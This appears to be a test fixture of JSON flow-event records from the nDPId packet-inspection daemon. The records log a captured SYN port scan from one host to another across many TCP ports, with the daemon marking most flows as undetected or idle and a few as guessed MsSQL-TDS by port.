+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 